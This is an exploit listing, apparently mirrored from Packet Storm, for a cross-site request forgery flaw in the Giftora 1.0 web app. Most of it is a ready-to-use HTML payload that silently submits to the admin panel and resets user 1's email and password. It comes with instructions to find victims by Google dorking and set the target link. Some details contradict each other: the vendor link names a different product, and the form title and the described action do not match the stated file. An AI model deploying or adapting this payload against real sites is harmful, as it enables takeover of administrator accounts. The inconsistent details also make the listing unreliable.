Share
## https://sploitus.com/exploit?id=PACKETSTORM:180077
=============================================================================================================================================  
| # Title : Giftora V 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following HTML Add New posts .  
  
[+] Go to the line 10. Set the target site link Save changes and apply .   
  
[+] infected file : /admincp/new-post.  
  
[+] save code as poc.html   
  
[+] payload :   
  
</head>  
<body>  
<div class="container">  
<div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
<form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST" enctype="multipart/form-data">  
<div hidden="true">  
<input type="text" name="id" id="id" value="1">  
</div>  
<div>  
<label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
</div>  
<div>  
<label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456">  
</div>  
<tr>  
<div>  
<label for='status'>Status</label>  
<input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
<input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>  
  
</div>   
<div style='height:80'>  
<input type='submit' value='Submit'><input type='reset' Value='Reset'>  
</div>  
</form>  
</div>  
  
</body>  
</html>  
[+] demo https://127.0.0.1/giftora.webister.net/blog  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================